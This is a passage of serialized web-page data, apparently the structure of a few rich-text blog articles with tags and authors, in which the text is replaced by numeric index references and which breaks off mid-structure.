",{"items":37074},[37075,37558,38386],{"__typename":2059,"sys":37076,"content":37077,"title":35812,"synopsis":35813,"hashTags":59,"publishedDate":35814,"slug":35815,"tagsCollection":37548,"authorsCollection":37554},{"id":35267},{"json":37078},{"data":37079,"content":37080,"nodeType":856},{},[37081,37087,37093,37119,37125,37131,37137,37140,37147,37163,37169,37174,37180,37185,37191,37196,37202,37207,37213,37218,37224,37230,37235,37238,37245,37261,37267,37273,37278,37294,37301,37317,37324,37340,37346,37351,37377,37384,37410,37417,37433,37438,37441,37448,37464,37469,37472,37479,37485,37491,37494,37501,37507,37513,37537,37542],{"data":37082,"content":37083,"nodeType":860},{},[37084],{"data":37085,"marks":37086,"value":35278,"nodeType":864},{},[],{"data":37088,"content":37089,"nodeType":860},{},[37090],{"data":37091,"marks":37092,"value":26797,"nodeType":864},{},[],{"data":37094,"content":37095,"nodeType":860},{},[37096,37099,37106,37109,37116],{"data":37097,"marks":37098,"value":35291,"nodeType":864},{},[],{"data":37100,"content":37101,"nodeType":883},{"uri":35294},[37102],{"data":37103,"marks":37104,"value":26813,"nodeType":864},{},[37105],{"type":1455},{"data":37107,"marks":37108,"value":2232,"nodeType":864},{},[],{"data":37110,"content":37111,"nodeType":883},{"uri":7124},[37112],{"data":37113,"marks":37114,"value":13810,"nodeType":864},{},[37115],{"type":1455},{"data":37117,"marks":37118,"value":35313,"nodeType":864},{},[],{"data":37120,"content":37121,"nodeType":860},{},[37122],{"data":37123,"marks":37124,"value":35320,"nodeType":864},{},[],{"data":37126,"content":37127,"nodeType":860},{},[37128],{"data":37129,"marks":37130,"value":35327,"nodeType":864},{},[],{"data":37132,"content":37133,"nodeType":860},{},[37134],{"data":37135,"marks":37136,"value":35334,"nodeType":864},{},[],{"data":37138,"content":37139,"nodeType":1005},{},[],{"data":37141,"content":37142,"nodeType":1009},{},[37143],{"data":37144,"marks":37145,"value":35345,"nodeType":864},{},[37146],{"type":899},{"data":37148,"content":37149,"nodeType":860},{},[37150,37153,37160],{"data":37151,"marks":37152,"value":35352,"nodeType":864},{},[],{"data":37154,"content":37155,"nodeType":883},{"uri":35355},[37156],{"data":37157,"marks":37158,"value":35361,"nodeType":864},{},[37159],{"type":1455},{"data":37161,"marks":37162,"value":35365,"nodeType":864},{},[],{"data":37164,"content":37165,"nodeType":860},{},[37166],{"data":37167,"marks":37168,"value":35372,"nodeType":864},{},[],{"data":37170,"content":37173,"nodeType":996},{"target":37171},{"sys":37172},{"id":35377,"type":1001,"linkType":1002},[],{"data":37175,"content":37176,"nodeType":860},{},[37177],{"data":37178,"marks":37179,"value":35385,"nodeType":864},{},[],{"data":37181,"content":37184,"nodeType":996},{"target":37182},{"sys":37183},{"id":35390,"type":1001,"linkType":1002},[],{"data":37186,"content":37187,"nodeType":860},{},[37188],{"data":37189,"marks":37190,"value":35398,"nodeType":864},{},[],{"data":37192,"content":37195,"nodeType":996},{"target":37193},{"sys":37194},{"id":35403,"type":1001,"linkType":1002},[],{"data":37197,"content":37198,"nodeType":860},{},[37199],{"data":37200,"marks":37201,"value":35411,"nodeType":864},{},[],{"data":37203,"content":37206,"nodeType":996},{"target":37204},{"sys":37205},{"id":35416,"type":1001,"linkType":1002},[],{"data":37208,"content":37209,"nodeType":860},{},[37210],{"data":37211,"marks":37212,"value":35424,"nodeType":864},{},[],{"data":37214,"content":37217,"nodeType":996},{"target":37215},{"sys":37216},{"id":35429,"type":1001,"linkType":1002},[],{"data":37219,"content":37220,"nodeType":860},{},[37221],{"data":37222,"marks":37223,"value":35437,"nodeType":864},{},[],{"data":37225,"content":37226,"nodeType":860},{},[37227],{"data":37228,"marks":37229,"value":35444,"nodeType":864},{},[],{"data":37231,"content":37234,"nodeType":996},{"target":37232},{"sys":37233},{"id":35449,"type":1001,"linkType":1002},[],{"data":37236,"content":37237,"nodeType":1005},{},[],{"data":37239,"content":37240,"nodeType":1009},{},[37241],{"data":37242,"marks":37243,"value":35461,"nodeType":864},{},[37244],{"type":899},{"data":37246,"content":37247,"nodeType":860},{},[37248,37251,37258],{"data":37249,"marks":37250,"value":35468,"nodeType":864},{},[],{"data":37252,"content":37253,"nodeType":883},{"uri":35471},[37254],{"data":37255,"marks":37256,"value":35477,"nodeType":864},{},[37257],{"type":1455},{"data":37259,"marks":37260,"value":35481,"nodeType":864},{},[],{"data":37262,"content":37263,"nodeType":860},{},[37264],{"data":37265,"marks":37266,"value":35488,"nodeType":864},{},[],{"data":37268,"content":37269,"nodeType":860},{},[37270],{"data":37271,"marks":37272,"value":35495,"nodeType":864},{},[],{"data":37274,"content":37277,"nodeType":996},{"target":37275},{"sys":37276},{"id":35500,"type":1001,"linkType":1002},[],{"data":37279,"content":37280,"nodeType":860},{},[37281,37284,37291],{"data":37282,"marks":37283,"value":35508,"nodeType":864},{},[],{"data":37285,"content":37286,"nodeType":883},{"uri":7124},[37287],{"data":37288,"marks":37289,"value":13810,"nodeType":864},{},[37290],{"type":1455},{"data":37292,"marks":37293,"value":35519,"nodeType":864},{},[],{"data":37295,"content":37296,"nodeType":1312},{},[37297],{"data":37298,"marks":37299,"value":35527,"nodeType":864},{},[37300],{"type":899},{"data":37302,"content":37303,"nodeType":860},{},[37304,37307,37314],{"data":37305,"marks":37306,"value":35534,"nodeType":864},{},[],{"data":37308,"content":37309,"nodeType":883},{"uri":35537},[37310],{"data":37311,"marks":37312,"value":35543,"nodeType":864},{},[37313],{"type":1455},{"data":37315,"marks":37316,"value":35547,"nodeType":864},{},[],{"data":37318,"content":37319,"nodeType":1312},{},[37320],{"data":37321,"marks":37322,"value":35555,"nodeType":864},{},[37323],{"type":899},{"data":37325,"content":37326,"nodeType":860},{},[37327,37330,37337],{"data":37328,"marks":37329,"value":21,"nodeType":864},{},[],{"data":37331,"content":37332,"nodeType":883},{"uri":26883},[37333],{"data":37334,"marks":37335,"value":35569,"nodeType":864},{},[37336],{"type":1455},{"data":37338,"marks":37339,"value":35573,"nodeType":864},{},[],{"data":37341,"content":37342,"nodeType":860},{},[37343],{"data":37344,"marks":37345,"value":35580,"nodeType":864},{},[],{"data":37347,"content":37350,"nodeType":996},{"target":37348},{"sys":37349},{"id":35585,"type":1001,"linkType":1002},[],{"data":37352,"content":37353,"nodeType":860},{},[37354,37357,37364,37367,37374],{"data":37355,"marks":37356,"value":35593,"nodeType":864},{},[],{"data":37358,"content":37359,"nodeType":883},{"uri":29155},[37360],{"data":37361,"marks":37362,"value":35601,"nodeType":864},{},[37363],{"type":1455},{"data":37365,"marks":37366,"value":35605,"nodeType":864},{},[],{"data":37368,"content":37369,"nodeType":883},{"uri":35608},[37370],{"data":37371,"marks":37372,"value":35614,"nodeType":864},{},[37373],{"type":1455},{"data":37375,"marks":37376,"value":35618,"nodeType":864},{},[],{"data":37378,"content":37379,"nodeType":1312},{},[37380],{"data":37381,"marks":37382,"value":35626,"nodeType":864},{},[37383],{"type":899},{"data":37385,"content":37386,"nodeType":860},{},[37387,37390,37397,37400,37407],{"data":37388,"marks":37389,"value":35633,"nodeType":864},{},[],{"data":37391,"content":37392,"nodeType":883},{"uri":35636},[37393],{"data":37394,"marks":37395,"value":35642,"nodeType":864},{},[37396],{"type":1455},{"data":37398,"marks":37399,"value":35646,"nodeType":864},{},[],{"data":37401,"content":37402,"nodeType":883},{"uri":35649},[37403],{"data":37404,"marks":37405,"value":35655,"nodeType":864},{},[37406],{"type":1455},{"data":37408,"marks":37409,"value":35659,"nodeType":864},{},[],{"data":37411,"content":37412,"nodeType":1312},{},[37413],{"data":37414,"marks":37415,"value":35667,"nodeType":864},{},[37416],{"type":899},{"data":37418,"content":37419,"nodeType":860},{},[37420,37423,37430],{"data":37421,"marks":37422,"value":35674,"nodeType":864},{},[],{"data":37424,"content":37425,"nodeType":883},{"uri":35677},[37426],{"data":37427,"marks":37428,"value":35683,"nodeType":864},{},[37429],{"type":1455},{"data":37431,"marks":37432,"value":35687,"nodeType":864},{},[],{"data":37434,"content":37437,"nodeType":996},{"target":37435},{"sys":37436},{"id":27224,"type":1001,"linkType":1002},[],{"data":37439,"content":37440,"nodeType":1005},{},[],{"data":37442,"content":37443,"nodeType":1009},{},[37444],{"data":37445,"marks":37446,"value":35703,"nodeType":864},{},[37447],{"type":899},{"data":37449,"content":37450,"nodeType":860},{},[37451,37454,37461],{"data":37452,"marks":37453,"value":35710,"nodeType":864},{},[],{"data":37455,"content":37456,"nodeType":883},{"uri":35713},[37457],{"data":37458,"marks":37459,"value":35719,"nodeType":864},{},[37460],{"type":1455},{"data":37462,"marks":37463,"value":35723,"nodeType":864},{},[],{"data":37465,"content":37468,"nodeType":996},{"target":37466},{"sys":37467},{"id":35728,"type":1001,"linkType":1002},[],{"data":37470,"content":37471,"nodeType":1005},{},[],{"data":37473,"content":37474,"nodeType":1009},{},[37475],{"data":37476,"marks":37477,"value":24968,"nodeType":864},{},[37478],{"type":899},{"data":37480,"content":37481,"nodeType":860},{},[37482],{"data":37483,"marks":37484,"value":35746,"nodeType":864},{},[],{"data":37486,"content":37487,"nodeType":860},{},[37488],{"data":37489,"marks":37490,"value":35753,"nodeType":864},{},[],{"data":37492,"content":37493,"nodeType":1005},{},[],{"data":37495,"content":37496,"nodeType":1009},{},[37497],{"data":37498,"marks":37499,"value":17636,"nodeType":864},{},[37500],{"type":899},{"data":37502,"content":37503,"nodeType":860},{},[37504],{"data":37505,"marks":37506,"value":29331,"nodeType":864},{},[],{"data":37508,"content":37509,"nodeType":860},{},[37510],{"data":37511,"marks":37512,"value":35776,"nodeType":864},{},[],{"data":37514,"content":37515,"nodeType":860},{},[37516,37519,37525,37528,37534],{"data":37517,"marks":37518,"value":16314,"nodeType":864},{},[],{"data":37520,"content":37521,"nodeType":883},{"uri":10269},[37522],{"data":37523,"marks":37524,"value":10275,"nodeType":864},{},[],{"data":37526,"marks":37527,"value":19754,"nodeType":864},{},[],{"data":37529,"content":37530,"nodeType":883},{"uri":1700},[37531],{"data":37532,"marks":37533,"value":10299,"nodeType":864},{},[],{"data":37535,"marks":37536,"value":2924,"nodeType":864},{},[],{"data":37538,"content":37541,"nodeType":996},{"target":37539},{"sys":37540},{"id":27224,"type":1001,"linkType":1002},[],{"data":37543,"content":37544,"nodeType":860},{},[37545],{"data":37546,"marks":37547,"value":21,"nodeType":864},{},[],{"items":37549},[37550,37552],{"sys":37551,"name":6593},{"id":6592},{"sys":37553,"name":342},{"id":6596},{"items":37555},[37556],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":37557},{"url":2740},{"__typename":2059,"sys":37559,"content":37560,"title":19765,"synopsis":19766,"hashTags":59,"publishedDate":19767,"slug":19768,"tagsCollection":38376,"authorsCollection":38382},{"id":18820},{"json":37561},{"data":37562,"content":37563,"nodeType":856},{},[37564,37570,37576,37582,37585,37592,37598,37604,37609,37615,37620,37636,37642,37652,37655,37662,37668,37681,37687,37697,37702,37705,37712,37719,37724,37732,37748,37756,37762,37770,37785,37793,37799,37807,37833,37841,37847,37855,37871,37876,37884,37890,37898,37931,37934,37941,37949,37965,37973,37979,37987,38013,38018,38026,38032,38037,38040,38047,38055,38061,38112,38117,38120,38127,38135,38141,38146,38149,38156,38162,38168,38228,38234,38289,38295,38298,38305,38311,38317,38322,38325,38332,38338,38344,38350],{"data":37565,"content":37566,"nodeType":860},{},[37567],{"data":37568,"marks":37569,"value":18831,"nodeType":864},{},[],{"data":37571,"content":37572,"nodeType":860},{},[37573],{"data":37574,"marks":37575,"value":18838,"nodeType":864},{},[],{"data":37577,"content":37578,"nodeType":860},{},[37579],{"data":37580,"marks":37581,"value":18845,"nodeType":864},{},[],{"data":37583,"content":37584,"nodeType":1005},{},[],{"data":37586,"content":37587,"nodeType":1009},{},[37588],{"data":37589,"marks":37590,"value":18856,"nodeType":864},{},[37591],{"type":899},{"data":37593,"content":37594,"nodeType":860},{},[37595],{"data":37596,"marks":37597,"value":18863,"nodeType":864},{},[],{"data":37599,"content":37600,"nodeType":860},{},[37601],{"data":37602,"marks":37603,"value":18870,"nodeType":864},{},[],{"data":37605,"content":37608,"nodeType":996},{"target":37606},{"sys":37607},{"id":18875,"type":1001,"linkType":1002},[],{"data":37610,"content":37611,"nodeType":860},{},[37612],{"data":37613,"marks":37614,"value":18883,"nodeType":864},{},[],{"data":37616,"content":37619,"nodeType":996},{"target":37617},{"sys":37618},{"id":18888,"type":1001,"linkType":1002},[],{"data":37621,"content":37622,"nodeType":860},{},[37623,37626,37633],{"data":37624,"marks":37625,"value":18896,"nodeType":864},{},[],{"data":37627,"content":37628,"nodeType":883},{"uri":17177},[37629],{"data":37630,"marks":37631,"value":18904,"nodeType":864},{},[37632],{"type":1455},{"data":37634,"marks":37635,"value":18908,"nodeType":864},{},[],{"data":37637,"content":37638,"nodeType":860},{},[37639],{"data":37640,"marks":37641,"value":18915,"nodeType":864},{},[],{"data":37643,"content":37644,"nodeType":860},{},[37645,37648],{"data":37646,"marks":37647,"value":18922,"nodeType":864},{},[],{"data":37649,"marks":37650,"value":18927,"nodeType":864},{},[37651],{"type":899},{"data":37653,"content":37654,"nodeType":1005},{},[],{"data":37656,"content":37657,"nodeType":1009},{},[37658],{"data":37659,"marks":37660,"value":18938,"nodeType":864},{},[37661],{"type":899},{"data":37663,"content":37664,"nodeType":860},{},[37665],{"data":37666,"marks":37667,"value":18945,"nodeType":864},{},[],{"data":37669,"content":37670,"nodeType":860},{},[37671,37674,37678],{"data":37672,"marks":37673,"value":18952,"nodeType":864},{},[],{"data":37675,"marks":37676,"value":18957,"nodeType":864},{},[37677],{"type":899},{"data":37679,"marks":37680,"value":18961,"nodeType":864},{},[],{"data":37682,"content":37683,"nodeType":860},{},[37684],{"data":37685,"marks":37686,"value":18968,"nodeType":864},{},[],{"data":37688,"content":37689,"nodeType":860},{},[37690,37693],{"data":37691,"marks":37692,"value":18975,"nodeType":864},{},[],{"data":37694,"marks":37695,"value":18980,"nodeType":864},{},[37696],{"type":899},{"data":37698,"content":37701,"nodeType":996},{"target":37699},{"sys":37700},{"id":18985,"type":1001,"linkType":1002},[],{"data":37703,"content":37704,"nodeType":1005},{},[],{"data":37706,"content":37707,"nodeType":1009},{},[37708],{"data":37709,"marks":37710,"value":18997,"nodeType":864},{},[37711],{"type":899},{"data":37713,"content":37714,"nodeType":1312},{},[37715],{"data":37716,"marks":37717,"value":19005,"nodeType":864},{},[37718],{"type":899},{"data":37720,"content":37723,"nodeType":996},{"target":37721},{"sys":37722},{"id":19010,"type":1001,"linkType":1002},[],{"data":37725,"content":37726,"nodeType":860},{},[37727],{"data":37728,"marks":37729,"value":19020,"nodeType":864},{},[37730,37731],{"type":899},{"type":1455},{"data":37733,"content":37734,"nodeType":860},{},[37735,37738,37745],{"data":37736,"marks":37737,"value":19027,"nodeType":864},{},[],{"data":37739,"content":37740,"nodeType":883},{"uri":19030},[37741],{"data":37742,"marks":37743,"value":19036,"nodeType":864},{},[37744],{"type":1455},{"data":37746,"marks":37747,"value":19040,"nodeType":864},{},[],{"data":37749,"content":37750,"nodeType":860},{},[37751],{"data":37752,"marks":37753,"value":19049,"nodeType":864},{},[37754,37755],{"type":899},{"type":1455},{"data":37757,"content":37758,"nodeType":860},{},[37759],{"data":37760,"marks":37761,"value":19056,"nodeType":864},{},[],{"data":37763,"content":37764,"nodeType":860},{},[37765],{"data":37766,"marks":37767,"value":19065,"nodeType":864},{},[37768,37769],{"type":899},{"type":1455},{"data":37771,"content":37772,"nodeType":860},{},[37773,37776,37782],{"data":37774,"marks":37775,"value":19072,"nodeType":864},{},[],{"data":37777,"content":37778,"nodeType":883},{"uri":19075},[37779],{"data":37780,"marks":37781,"value":19080,"nodeType":864},{},[],{"data":37783,"marks":37784,"value":19084,"nodeType":864},{},[],{"data":37786,"content":37787,"nodeType":860},{},[37788],{"data":37789,"marks":37790,"value":19093,"nodeType":864},{},[37791,37792],{"type":899},{"type":1455},{"data":37794,"content":37795,"nodeType":860},{},[37796],{"data":37797,"marks":37798,"value":19100,"nodeType":864},{},[],{"data":37800,"content":37801,"nodeType":860},{},[37802],{"data":37803,"marks":37804,"value":19109,"nodeType":864},{},[37805,37806],{"type":899},{"type":1455},{"data":37808,"content":37809,"nodeType":860},{},[37810,37813,37820,37823,37830],{"data":37811,"marks":37812,"value":19116,"nodeType":864},{},[],{"data":37814,"content":37815,"nodeType":883},{"uri":3751},[37816],{"data":37817,"marks":37818,"value":19124,"nodeType":864},{},[37819],{"type":1455},{"data":37821,"marks":37822,"value":19128,"nodeType":864},{},[],{"data":37824,"content":37825,"nodeType":883},{"uri":19131},[37826],{"data":37827,"marks":37828,"value":19137,"nodeType":864},{},[37829],{"type":1455},{"data":37831,"marks":37832,"value":19141,"nodeType":864},{},[],{"data":37834,"content":37835,"nodeType":860},{},[37836],{"data":37837,"marks":37838,"value":19150,"nodeType":864},{},[37839,37840],{"type":899},{"type":1455},{"data":37842,"content":37843,"nodeType":860},{},[37844],{"data":37845,"marks":37846,"value":19157,"nodeType":864},{},[],{"data":37848,"content":37849,"nodeType":860},{},[37850],{"data":37851,"marks":37852,"value":19166,"nodeType":864},{},[37853,37854],{"type":899},{"type":1455},{"data":37856,"content":37857,"nodeType":860},{},[37858,37861,37868],{"data":37859,"marks":37860,"value":19173,"nodeType":864},{},[],{"data":37862,"content":37863,"nodeType":883},{"uri":19131},[37864],{"data":37865,"marks":37866,"value":19137,"nodeType":864},{},[37867],{"type":1455},{"data":37869,"marks":37870,"value":19184,"nodeType":864},{},[],{"data":37872,"content":37875,"nodeType":996},{"target":37873},{"sys":37874},{"id":19189,"type":1001,"linkType":1002},[],{"data":37877,"content":37878,"nodeType":860},{},[37879],{"data":37880,"marks":37881,"value":19199,"nodeType":864},{},[37882,37883],{"type":899},{"type":1455},{"data":37885,"content":37886,"nodeType":860},{},[37887],{"data":37888,"marks":37889,"value":19206,"nodeType":864},{},[],{"data":37891,"content":37892,"nodeType":860},{},[37893],{"data":37894,"marks":37895,"value":19215,"nodeType":864},{},[37896,37897],{"type":899},{"type":1455},{"data":37899,"content":37900,"nodeType":860},{},[37901,37904,37910,37913,37919,37922,37928],{"data":37902,"marks":37903,"value":19222,"nodeType":864},{},[],{"data":37905,"content":37906,"nodeType":883},{"uri":19225},[37907],{"data":37908,"marks":37909,"value":19230,"nodeType":864},{},[],{"data":37911,"marks":37912,"value":902,"nodeType":864},{},[],{"data":37914,"content":37915,"nodeType":883},{"uri":19236},[37916],{"data":37917,"marks":37918,"value":19241,"nodeType":864},{},[],{"data":37920,"marks":37921,"value":19245,"nodeType":864},{},[],{"data":37923,"content":37924,"nodeType":883},{"uri":6259},[37925],{"data":37926,"marks":37927,"value":19252,"nodeType":864},{},[],{"data":37929,"marks":37930,"value":19256,"nodeType":864},{},[],{"data":37932,"content":37933,"nodeType":1005},{},[],{"data":37935,"content":37936,"nodeType":1312},{},[37937],{"data":37938,"marks":37939,"value":19267,"nodeType":864},{},[37940],{"type":899},{"data":37942,"content":37943,"nodeType":860},{},[37944],{"data":37945,"marks":37946,"value":19276,"nodeType":864},{},[37947,37948],{"type":899},{"type":1455},{"data":37950,"content":37951,"nodeType":860},{},[37952,37955,37962],{"data":37953,"marks":37954,"value":19283,"nodeType":864},{},[],{"data":37956,"content":37957,"nodeType":883},{"uri":19286},[37958],{"data":37959,"marks":37960,"value":19292,"nodeType":864},{},[37961],{"type":1455},{"data":37963,"marks":37964,"value":19296,"nodeType":864},{},[],{"data":37966,"content":37967,"nodeType":860},{},[37968],{"data":37969,"marks":37970,"value":19305,"nodeType":864},{},[37971,37972],{"type":899},{"type":1455},{"data":37974,"content":37975,"nodeType":860},{},[37976],{"data":37977,"marks":37978,"value":19312,"nodeType":864},{},[],{"data":37980,"content":37981,"nodeType":860},{},[37982],{"data":37983,"marks":37984,"value":19321,"nodeType":864},{},[37985,37986],{"type":899},{"type":1455},{"data":37988,"content":37989,"nodeType":860},{},[37990,37993,38000,38003,38010],{"data":37991,"marks":37992,"value":19328,"nodeType":864},{},[],{"data":37994,"content":37995,"nodeType":883},{"uri":19331},[37996],{"data":37997,"marks":37998,"value":19337,"nodeType":864},{},[37999],{"type":1455},{"data":38001,"marks":38002,"value":19341,"nodeType":864},{},[],{"data":38004,"content":38005,"nodeType":883},{"uri":19344},[38006],{"data":38007,"marks":38008,"value":19350,"nodeType":864},{},[38009],{"type":1455},{"data":38011,"marks":38012,"value":19354,"nodeType":864},{},[],{"data":38014,"content":38017,"nodeType":996},{"target":38015},{"sys":38016},{"id":19359,"type":1001,"linkType":1002},[],{"data":38019,"content":38020,"nodeType":860},{},[38021],{"data":38022,"marks":38023,"value":19369,"nodeType":864},{},[38024,38025],{"type":899},{"type":1455},{"data":38027,"content":38028,"nodeType":860},{},[38029],{"data":38030,"marks":38031,"value":19376,"nodeType":864},{},[],{"data":38033,"content":38036,"nodeType":996},{"target":38034},{"sys":38035},{"id":19381,"type":1001,"linkType":1002},[],{"data":38038,"content":38039,"nodeType":1005},{},[],{"data":38041,"content":38042,"nodeType":1312},{},[38043],{"data":38044,"marks":38045,"value":694,"nodeType":864},{},[38046],{"type":899},{"data":38048,"content":38049,"nodeType":860},{},[38050],{"data":38051,"marks":38052,"value":19401,"nodeType":864},{},[38053,38054],{"type":899},{"type":1455},{"data":38056,"content":38057,"nodeType":860},{},[38058],{"data":38059,"marks":38060,"value":19408,"nodeType":864},{},[],{"data":38062,"content":38063,"nodeType":941},{},[38064,38077,38090],{"data":38065,"content":38066,"nodeType":945},{},[38067],{"data":38068,"content":38069,"nodeType":860},{},[38070,38074],{"data":38071,"marks":38072,"value":19422,"nodeType":864},{},[38073],{"type":899},{"data":38075,"marks":38076,"value":19426,"nodeType":864},{},[],{"data":38078,"content":38079,"nodeType":945},{},[38080],{"data":38081,"content":38082,"nodeType":860},{},[38083,38087],{"data":38084,"marks":38085,"value":19437,"nodeType":864},{},[38086],{"type":899},{"data":38088,"marks":38089,"value":19441,"nodeType":864},{},[],{"data":38091,"content":38092,"nodeType":945},{},[38093],{"data":38094,"content":38095,"nodeType":860},{},[38096,38100,38103,38109],{"data":38097,"marks":38098,"value":19452,"nodeType":864},{},[38099],{"type":899},{"data":38101,"marks":38102,"value":19456,"nodeType":864},{},[],{"data":38104,"content":38105,"nodeType":883},{"uri":19459},[38106],{"data":38107,"marks":38108,"value":19464,"nodeType":864},{},[],{"data":38110,"marks":38111,"value":19468,"nodeType":864},{},[],{"data":38113,"content":38116,"nodeType":996},{"target":38114},{"sys":38115},{"id":19473,"type":1001,"linkType":1002},[],{"data":38118,"content":38119,"nodeType":1005},{},[],{"data":38121,"content":38122,"nodeType":1312},{},[38123],{"data":38124,"marks":38125,"value":699,"nodeType":864},{},[38126],{"type":899},{"data":38128,"content":38129,"nodeType":860},{},[38130],{"data":38131,"marks":38132,"value":19493,"nodeType":864},{},[38133,38134],{"type":899},{"type":1455},{"data":38136,"content":38137,"nodeType":860},{},[38138],{"data":38139,"marks":38140,"value":19500,"nodeType":864},{},[],{"data":38142,"content":38145,"nodeType":996},{"target":38143},{"sys":38144},{"id":19505,"type":1001,"linkType":1002},[],{"data":38147,"content":38148,"nodeType":1005},{},[],{"data":38150,"content":38151,"nodeType":1009},{},[38152],{"data":38153,"marks":38154,"value":5520,"nodeType":864},{},[38155],{"type":899},{"data":38157,"content":38158,"nodeType":860},{},[38159],{"data":38160,"marks":38161,"value":19523,"nodeType":864},{},[],{"data":38163,"content":38164,"nodeType":860},{},[38165],{"data":38166,"marks":38167,"value":19530,"nodeType":864},{},[],{"data":38169,"content":38170,"nodeType":941},{},[38171,38190,38209],{"data":38172,"content":38173,"nodeType":945},{},[38174],{"data":38175,"content":38176,"nodeType":860},{},[38177,38180,38187],{"data":38178,"marks":38179,"value":19543,"nodeType":864},{},[],{"data":38181,"content":38182,"nodeType":883},{"uri":19546},[38183],{"data":38184,"marks":38185,"value":13585,"nodeType":864},{},[38186],{"type":1455},{"data":38188,"marks":38189,"value":10724,"nodeType":864},{},[],{"data":38191,"content":38192,"nodeType":945},{},[38193],{"data":38194,"content":38195,"nodeType":860},{},[38196,38199,38206],{"data":38197,"marks":38198,"value":19564,"nodeType":864},{},[],{"data":38200,"content":38201,"nodeType":883},{"uri":19567},[38202],{"data":38203,"marks":38204,"value":19573,"nodeType":864},{},[38205],{"type":1455},{"data":38207,"marks":38208,"value":10724,"nodeType":864},{},[],{"data":38210,"content":38211,"nodeType":945},{},[38212],{"data":38213,"content":38214,"nodeType":860},{},[38215,38218,38225],{"data":38216,"marks":38217,"value":19586,"nodeType":864},{},[],{"data":38219,"content":38220,"nodeType":883},{"uri":19589},[38221],{"data":38222,"marks":38223,"value":19595,"nodeType":864},{},[38224],{"type":1455},{"data":38226,"marks":38227,"value":10724,"nodeType":864},{},[],{"data":38229,"content":38230,"nodeType":860},{},[38231],{"data":38232,"marks":38233,"value":19605,"nodeType":864},{},[],{"data":38235,"content":38236,"nodeType":941},{},[38237,38250,38263,38276],{"data":38238,"content":38239,"nodeType":945},{},[38240],{"data":38241,"content":38242,"nodeType":860},{},[38243,38247],{"data":38244,"marks":38245,"value":19619,"nodeType":864},{},[38246],{"type":899},{"data":38248,"marks":38249,"value":19623,"nodeType":864},{},[],{"data":38251,"content":38252,"nodeType":945},{},[38253],{"data":38254,"content":38255,"nodeType":860},{},[38256,38260],{"data":38257,"marks":38258,"value":19634,"nodeType":864},{},[38259],{"type":899},{"data":38261,"marks":38262,"value":19638,"nodeType":864},{},[],{"data":38264,"content":38265,"nodeType":945},{},[38266],{"data":38267,"content":38268,"nodeType":860},{},[38269,38273],{"data":38270,"marks":38271,"value":19649,"nodeType":864},{},[38272],{"type":899},{"data":38274,"marks":38275,"value":19653,"nodeType":864},{},[],{"data":38277,"content":38278,"nodeType":945},{},[38279],{"data":38280,"content":38281,"nodeType":860},{},[38282,38286],{"data":38283,"marks":38284,"value":19664,"nodeType":864},{},[38285],{"type":899},{"data":38287,"marks":38288,"value":19668,"nodeType":864},{},[],{"data":38290,"content":38291,"nodeType":860},{},[38292],{"data":38293,"marks":38294,"value":19675,"nodeType":864},{},[],{"data":38296,"content":38297,"nodeType":1005},{},[],{"data":38299,"content":38300,"nodeType":1009},{},[38301],{"data":38302,"marks":38303,"value":19686,"nodeType":864},{},[38304],{"type":899},{"data":38306,"content":38307,"nodeType":860},{},[38308],{"data":38309,"marks":38310,"value":19693,"nodeType":864},{},[],{"data":38312,"content":38313,"nodeType":860},{},[38314],{"data":38315,"marks":38316,"value":19700,"nodeType":864},{},[],{"data":38318,"content":38321,"nodeType":996},{"target":38319},{"sys":38320},{"id":19705,"type":1001,"linkType":1002},[],{"data":38323,"content":38324,"nodeType":1005},{},[],{"data":38326,"content":38327,"nodeType":1009},{},[38328],{"data":38329,"marks":38330,"value":17636,"nodeType":864},{},[38331],{"type":899},{"data":38333,"content":38334,"nodeType":860},{},[38335],{"data":38336,"marks":38337,"value":19723,"nodeType":864},{},[],{"data":38339,"content":38340,"nodeType":860},{},[38341],{"data":38342,"marks":38343,"value":19730,"nodeType":864},{},[],{"data":38345,"content":38346,"nodeType":860},{},[38347],{"data":38348,"marks":38349,"value":19737,"nodeType":864},{},[],{"data":38351,"content":38352,"nodeType":860},{},[38353,38356,38363,38366,38373],{"data":38354,"marks":38355,"value":16314,"nodeType":864},{},[],{"data":38357,"content":38358,"nodeType":883},{"uri":10269},[38359],{"data":38360,"marks":38361,"value":10275,"nodeType":864},{},[38362],{"type":1455},{"data":38364,"marks":38365,"value":19754,"nodeType":864},{},[],{"data":38367,"content":38368,"nodeType":883},{"uri":1700},[38369],{"data":38370,"marks":38371,"value":10299,"nodeType":864},{},[38372],{"type":1455},{"data":38374,"marks":38375,"value":2924,"nodeType":864},{},[],{"items":38377},[38378,38380],{"sys":38379,"name":6593},{"id":6592},{"sys":38381,"name":342},{"id":6596},{"items":38383},[38384],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":38385},{"url":2740},{"__typename":2059,"sys":38387,"content":38388,"title":28782,"synopsis":28783,"hashTags":59,"publishedDate":28784,"slug":28785,"tagsCollection":38724,"authorsCollection":38730},{"id":28410},{"json":38389},{"data":38390,"content":38391,"nodeType":856},{},[38392,38399,38405,38410,38416,38446,38452,38457,38463,38468,38473,38478,38483,38488,38491,38498,38504,38510,38516,38523,38528,38544,38550,38566,38571,38574,38581,38587,38653,38659,38662,38669,38675,38681,38687,38713,38718],{"data":38393,"content":38394,"nodeType":1009},{},[38395],{"data":38396,"marks":38397,"value":20796,"nodeType":864},{},[38398],{"type":899},{"data":38400,"content":38401,"nodeType":860},{},[38402],{"data":38403,"marks":38404,"value":28428,"nodeType":864},{},[],{"data":38406,"content":38409,"nodeType":996},{"target":38407},{"sys":38408},{"id":28433,"type":1001,"linkType":1002},[],{"data":38411,"content":38412,"nodeType":860},{},[38413],{"data":38414,"marks":38415,"value":28441,"nodeType":864},{},[],{"data":38417,"content":38418,"nodeType":941},{},[38419,38428,38437],{"data":38420,"content":38421,"nodeType":945},{},[38422],{"data":38423,"content":38424,"nodeType":860},{},[38425],{"data":38426,"marks":38427,"value":28454,"nodeType":864},{},[],{"data":38429,"content":38430,"nodeType":945},{},[38431],{"data":38432,"content":38433,"nodeType":860},{},[38434],{"data":38435,"marks":38436,"value":28464,"nodeType":864},{},[],{"data":38438,"content":38439,"nodeType":945},{},[38440],{"data":38441,"content":38442,"nodeType":860},{},[38443],{"data":38444,"marks":38445,"value":28474,"nodeType":864},{},[],{"data":38447,"content":38448,"nodeType":860},{},[38449],{"data":38450,"marks":38451,"value":28481,"nodeType":864},{},[],{"data":38453,"content":38456,"nodeType":996},{"target":38454},{"sys":38455},{"id":28486,"type":1001,"linkType":1002},[],{"data":38458,"content":38459,"nodeType":860},{},[38460],{"data":384